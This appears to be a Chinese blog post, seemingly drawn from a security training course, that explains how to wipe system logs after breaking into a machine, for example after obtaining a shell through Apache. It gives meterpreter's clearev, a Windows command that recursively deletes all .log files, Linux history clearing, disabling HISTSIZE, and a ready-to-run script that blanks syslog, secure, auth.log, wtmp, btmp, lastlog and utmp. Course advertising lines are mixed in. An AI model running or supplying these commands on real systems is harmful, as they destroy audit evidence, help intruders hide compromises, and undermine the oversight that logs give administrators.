【网络安全】系统日志清理的操作步骤

仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,

如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日

志。

Windows 日志清理

Win+R 运行:eventvwr

正常的远程访问在 windows 的时间查看器中可以看到相关记录

meterpreter > clearev

删除系统日志目录下的一些日志文件。

meterpreter > shell

C:\Windows\system32>del %WINDIR%\*.log /a/s/q/f

11.5.2 Linux 日志清理

Linux 可能根据发行版本不同,日志文件名称也有所不同。所以具体清除需要大家先看一下目标操作

系统。

清理历史命令

history -c

使系统不再保存历史命令

vi /etc/profile,找到 HISTSIZE 这个值,修改为 0

删除访问日志

1. 访问失败的日志

删除登录失败记录:echo > /var/log/btmp

2. 访问成功的日志

请加学神 IT 教育官方 QQ 群:869961923 或李老师 QQ:3147296050 领取更多资料请加学神 IT 教育官方 QQ 群:869961923 或乔老师 QQ:2217978235 领取更多资料

删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)

3. 删除日志记录:echo > /var/log/secure

汇总脚本

[root@xu ~]# cat clog.sh

#!/usr/bin/bash

echo > /var/log/syslog

echo > /var/log/messages

echo > /var/log/httpd/access_log

echo > /var/log/httpd/error_log

echo > /var/log/xferlog

echo > /var/log/secure

echo > /var/log/auth.log

echo > /var/log/user.log

echo > /var/log/wtmp

echo > /var/log/lastlog

echo > /var/log/btmp

echo > /var/run/utmp

history -c

执行脚本

[root@xu ~]# source clog.sh

执行时注意文件是否有执行权限。而且删除日志一般只有 root 权限才可以。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值